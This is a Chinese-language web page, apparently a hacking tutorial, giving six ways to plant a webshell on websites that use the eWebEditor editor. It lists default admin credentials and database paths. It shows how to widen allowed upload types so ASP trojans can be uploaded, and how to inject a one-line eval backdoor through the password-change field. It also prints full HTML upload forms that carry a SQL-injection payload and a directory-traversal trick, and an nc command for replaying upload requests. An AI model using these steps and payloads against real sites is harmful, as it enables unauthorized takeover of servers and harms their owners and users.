脚本入侵 入侵ewebeditor编辑器一些技巧

2023-12-04 0 383

eWebEditor编辑器 建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理 默认后台地址:/ewebeditor/admin_login.asp 使用默认密码:admin/admin 或 admin/admin888 不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb 拿webshell方法第一种方法 登陆后台点击“样式管理”-选择新增样式 只写这几样 大家照做就行了 样式名称:chouxiaozi 随便写 路径模式:选择绝对路径 图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx 这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了 上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马 内容路径:空 记得 图片限制:写上1000 免的上不了我们的asp木马 然后我们就可以提交了 就可以看到样式增加成功! 然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置 在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击 然后上传我们的刚才添加的格式的木马 拿webshell方法第二种方法 登陆后台,点击修改密码—新密码设置为 1":eval request("choxiaozi")’ 设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了. 然后用一句话客户端连接 拿webshell方法第三种方法 ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell 下载教程看 拿webshell方法第四种方法 利用ewebeditor asp版 2.1.6 上传漏洞利用程序 首先先看eWebEditor/upload.asp 上传地址存在不 存在的话就把下面的代码保存为 H1>ewebeditor asp版 2.1.6 上传漏洞利用程序—-</H1><br><br> <form action="这里写上传地址?action=save&type=IMAGE&style=luoye\’ union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b\’|cer\’,S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name=\’standard\’and\’a\’=\’a" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=Fuck> </form> 改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件 就可以看到我们上传的路径和地址 拿webshell方法第五种方法 ewebeditor 鸡肋的上传漏洞 首先先看下ewebeditor/asp/upload.asp 上传地址存在不 存在就 把下面的代码 <form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data"> <input type=file name=uploadfile size=100><br><br> <input type=submit value=upload> </form> 然后保存为chouxiaozi.html 打开可以直接上传gif文件,测试成功.上传后地址看源文件 就可以看到我们上传的路径和地址 拿webshell方法第六种方法 利用eWebEditor/upload.asp 抓包和nc上传 抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt 然后用编译C32asm 或等等编译工具 修改 然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt 不懂抓包和nc上传 百度搜索相关教程 回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址 我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信/支付宝扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

悠久资源 脚本攻防 脚本入侵 入侵ewebeditor编辑器一些技巧 https://www.u-9.cn/security/gongfang/70985.html

常见问题

相关文章

发表评论
暂无评论
官方客服团队

为您解决烦忧 - 24小时在线 专业服务